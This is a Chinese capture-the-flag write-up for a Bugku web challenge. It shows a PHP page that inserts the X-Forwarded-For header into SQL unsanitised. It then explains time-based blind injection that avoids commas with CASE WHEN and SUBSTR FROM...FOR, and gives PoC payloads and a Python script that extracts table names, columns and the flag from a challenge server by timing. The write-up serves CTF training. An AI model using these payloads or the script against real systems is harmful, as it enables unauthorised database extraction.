bugku web题INSERT INTO注入

0x01:

　　打开题目描述，已经将源码给了我们：

<?php
error_reporting(0);

function getIp(){
$ip = '';
if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){
$ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
}else{
$ip = $_SERVER['REMOTE_ADDR'];
}
$ip_arr = explode(',', $ip);
return $ip_arr[0];

}

$host="localhost";
$user="";
$pass="";
$db="";

$connect = mysql_connect($host, $user, $pass) or die("Unable to connect");

mysql_select_db($db) or die("Unable to select database");

$ip = getIp();
echo 'your ip is :'.$ip;
$sql="insert into client_ip (ip) values ('$ip')";
mysql_query($sql);

　　明确注入点，是走的http报头的x-forwarded-for。

　　我尝试了bool型注入，发现自己构造的语句在自己数据库中会报错，但是这里并没有错误报告，因此考虑基于时间的盲注

 

0x02:

　　我之前时间延迟盲注都是用 if(exp1,exp2,epx3) 这种格式来完成的，但是这里的一段代码，相当于把 "," 给过滤了

　　$ip_arr = explode(',', $ip);
　　return $ip_arr[0];

　　于是改变方法，用 case when exp1 then sleep(4) else 1 end 来绕过 ","的限制

　　exp1 中要用到substr来进行剪切，这个函数substr(str,1,1) 又是存在 "," , 于是这里我又用 substr (str) from 1 for 1 来绕过 ","的限制

　　又拼接的语句为value(' 输入的内容 ')，最后的poc为：

　　1' and (case when (length((select database())) = 14) then sleep(4) else 1 end) #

　　1' and (case when (substr(select database())  from 1 for 1)='c' then sleep(4) else 1 end) # 

　　构成的完整语句为

insert into client_ip (ip) values ('  1' and (case when (length((select database())) = 14) then sleep(4) else 1 end) #  ')

0x03:

　　最后附上python脚本：

#-*- encoding: utf-8 -*-
#字符长度直接手工测的
import requests
url="http://120.24.86.145:8002/web15/"
flag=""

#data = 11'  and (case when (length((select group_concat(table_name) from information_schema.tables where table_name=database()))=14) then sleep(4) else 1 end)) #
#爆表名 长度为14
#data = "11'and (case when (substr((select group_concat(table_name) from information_schema.tables where table_schema=database() ) from " + str(i) + " for 1 )='" + str1 + "') then sleep(4) else 1 end )) #"
#client_ip,flag

#data = 11'  and (case when (length((select group_concat(column_name) from information_schema.columns where table_name='flag'))=4) then sleep(4) else 1 end)) #
#爆字段 长度为4
#data = "11' and (case when (substr((select group_concat(column_name) from information_schema.columns where table_name='flag') from " + str(i) + " for 1 )='" + str1 + "') then sleep(4) else 1 end )) #"
#flag

#data = 11'  and (case when (length((select group_concat(flag) from flag))=32) then sleep(4) else 1 end)) #
#爆内容 长度为32
#data = "11' and (case when (substr((select group_concat(flag) from flag) from " + str(i) + " for 1 )='" + str1 + "') then sleep(4) else 1 end )) #"

for i in range(1,33):
    for str1 in "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ,_!@#$%^&*.":
        data = "11' and (case when (substr((select group_concat(flag) from flag) from " + str(i) + " for 1 )='" + str1 + "') then sleep(4) else 1 end )) #"
        # print data
        headers = {"x-forwarded-for":data}
        try:
            result = requests.get(url,headers=headers,timeout=3)
        except requests.exceptions.ReadTimeout, e:
            flag += str1
            print flag
            break
print 'flag:' + flag

不同阶段把上面注释掉的data的赋值代码贴入下面即可，爆长度可以直接在BurpSuite里面发包手测

ps：在注表名的时候 ","因为是被过滤了的，所以脚本跑出来两个表之间的“,”是被过滤了，但是看单词也能把它区分开。